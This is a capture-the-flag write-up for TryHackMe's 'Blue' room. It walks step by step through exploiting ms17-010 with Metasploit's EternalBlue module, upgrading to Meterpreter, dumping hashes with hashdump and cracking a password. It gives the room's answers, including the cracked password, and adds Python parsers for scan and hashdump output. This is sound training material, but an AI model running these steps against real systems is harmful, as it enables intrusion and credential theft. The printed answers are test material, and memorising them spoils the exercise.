tryhackme Blue write-up
- Name: Blue
- Description: Deploy & hack into a Windows machine, leveraging common misconfiguration issues.
- Room: tryhackme.com
[Task 1] Recon
Scan the machine
First, we scan the machine to find open ports and the services listening on them:
sudo nmap -sS -A <machine_ip>
Question: How many ports are open with a port number under 1000?
Answer: 3
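The count the question asks for can be read straight off the scan if nmap is also told to emit grepable output (`-oG`). The parser below is an added example, not part of the original write-up: it embeds a constructed grepable-output sample (the hostname, exact port set and version strings are assumptions, not the real scan), counts the open ports under 1000, and also answers the question a defender asks of the same data: is SMB (139/445) reachable at all?

```python
import re
from dataclasses import dataclass

# Constructed sample of nmap's grepable output (-oG) for a host like this one.
# The hostname, the exact port set and the version strings are assumptions made
# for this example; they are not copied from the real scan.
SAMPLE_GNMAP = """\
# Nmap 7.94 scan initiated as: nmap -sS -A -oG - 10.10.10.10
Host: 10.10.10.10 ()\tStatus: Up
Host: 10.10.10.10 ()\tPorts: 135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, 445/open/tcp//microsoft-ds//Microsoft Windows 7 - 10 microsoft-ds/, 3389/open/tcp//ms-wbt-server///, 49152/open/tcp//msrpc//Microsoft Windows RPC/\tIgnored State: closed (995)
# Nmap done -- 1 IP address (1 host up) scanned
"""

# One entry in the "Ports:" field: port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")


@dataclass
class Port:
    host: str
    number: int
    state: str
    proto: str
    service: str
    version: str


def parse_gnmap(text):
    """Parse grepable nmap output into one Port record per port entry."""
    ports = []
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue  # comment lines and blank lines carry no port data
        fields = line.split("\t")
        host = fields[0].split()[1]  # "Host: 10.10.10.10 ()" -> "10.10.10.10"
        for field in fields[1:]:
            if field.startswith("Ports:"):
                for m in PORT_RE.finditer(field):
                    ports.append(Port(host, int(m.group(1)), m.group(2),
                                      m.group(3), m.group(5), m.group(7)))
    return ports


def open_ports_under(ports, limit=1000):
    """Open port numbers below `limit`; the Task 1 question wants how many there are."""
    return sorted({p.number for p in ports if p.state == "open" and p.number < limit})


def smb_exposed(ports):
    """Defender's check: SMB (445) or NetBIOS session (139) reachable from the scanner."""
    return [p for p in ports if p.state == "open" and p.number in (139, 445)]


if __name__ == "__main__":
    ports = parse_gnmap(SAMPLE_GNMAP)
    low = open_ports_under(ports)
    print(f"{len(low)} open ports under 1000: {low}")
    for p in smb_exposed(ports):
        print(f"SMB surface: {p.host}:{p.number} {p.service} {p.version!r}")
```

Run against a real scan with `nmap -sS -A -oG scan.gnmap <machine_ip>` and feed the file's contents to `parse_gnmap`; the version column is only populated when `-A` or `-sV` was used.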
Question: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
“We can check the security problems of a device using scripts in Nmap; for example, the vuln script can identify common problems.”
nmap <machine_ip> --script vuln
The machine appears to be vulnerable to ms17-010.
Answer: ms17-010
[Task 2] Gain Access
Start Metasploit
We know the machine has a known vulnerability, and we can use Metasploit to exploit it:
msfconsole
The next step is to find the appropriate exploit module for this vulnerability (ms17-010):
search ms17-010
Question: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
Answer: exploit/windows/smb/ms17_010_eternalblue
We have to select the desired exploit and set its required options:
use exploit/windows/smb/ms17_010_eternalblue
and
show options
Set the target machine's IP:
set RHOSTS <machine_ip>
Question: Show options and set the one required value. What is the name of this value? (All caps for submission)
Answer: RHOSTS
Run the exploit
You can see that the exploit ran and that we got a Windows command shell on the host. To continue, we need a Meterpreter shell, which lets us run commands and upload files more conveniently.
[Task 3] Escalate
We need to upgrade the plain shell to a Meterpreter session. Background the current session, then load the post module:
background
and
use post/multi/manage/shell_to_meterpreter
Question: If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
Answer: post/multi/manage/shell_to_meterpreter
List the sessions and set the session number of the shell we just backgrounded:
sessions -l
and
set SESSION 1
Question: Select this (use MODULE_PATH). Show options, what option are we required to change?
Answer: SESSION
If we list the sessions again, a new Meterpreter session has been added; interact with it:
sessions -l
sessions 2
We now have a Meterpreter shell, an interactive session back to the attacker from which we can explore the target machine and execute code.
Use the ps command to list all processes running on the host:
ps
[Task 4] Cracking
Use hashdump to dump the local user credential hashes:
hashdump
Question: Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Answer: Jon
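hashdump prints one line per local account in the form `user:RID:LM-hash:NT-hash:::`, and the RID is what tells the built-in accounts (Administrator is always 500, Guest 501) apart from accounts someone created, which start at RID 1000. The script below is an added example, not part of the original write-up or of Metasploit: it parses a constructed hashdump sample (the NT values for Administrator and Jon are placeholders, not the real hashes from this machine; the Guest line uses the well-known hash of an empty password), picks out the non-default user, and adds the two checks a defender would run over the same dump: whether LM hashes are still being stored and whether any account has a blank password.

```python
import re
from dataclasses import dataclass

# Well-known "empty" values: modern Windows no longer stores LM hashes, so this LM
# value appears on nearly every account; this NT value is the hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in hashdump's output format (user:RID:LM:NT:::).
# The NT hashes for Administrator and Jon are placeholders, not real hashes.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
"""

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str


def parse_hashdump(text):
    """Parse hashdump lines into Account records; reject anything malformed."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"not a hashdump line: {line!r}")
        accounts.append(Account(m.group(1), int(m.group(2)),
                                m.group(3).lower(), m.group(4).lower()))
    return accounts


def non_default_users(accounts):
    """Built-in accounts have RIDs below 1000 (500 Administrator, 501 Guest);
    locally created users are assigned RIDs from 1000 upwards."""
    return [a.user for a in accounts if a.rid >= 1000]


def audit(accounts):
    """Defender's findings from the dump: LM hashes still stored, blank passwords."""
    findings = []
    for a in accounts:
        if a.lm != EMPTY_LM:
            findings.append((a.user, "LM hash stored (weak legacy hash; disable LM storage)"))
        if a.nt == EMPTY_NT:
            findings.append((a.user, "blank password (verify the account is disabled)"))
    return findings


if __name__ == "__main__":
    accounts = parse_hashdump(SAMPLE_HASHDUMP)
    print("non-default users:", non_default_users(accounts))
    for user, finding in audit(accounts):
        print(f"{user}: {finding}")
```

On a real dump the NT field is what gets handed to hashcat (mode 1000) or John (format NT); the audit here only needs the hash values themselves, not the passwords behind them.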
Use the above link to crack the password hash, or crack it locally with hashcat or John the Ripper using the rockyou.txt wordlist.
Question: Copy this password hash to a file and research how to crack it. What is the cracked password?
Answer: alqfna22
[Task 5] Find flags!
Search for the flags using:
search -f flag*.txt
thank you 🌏🔥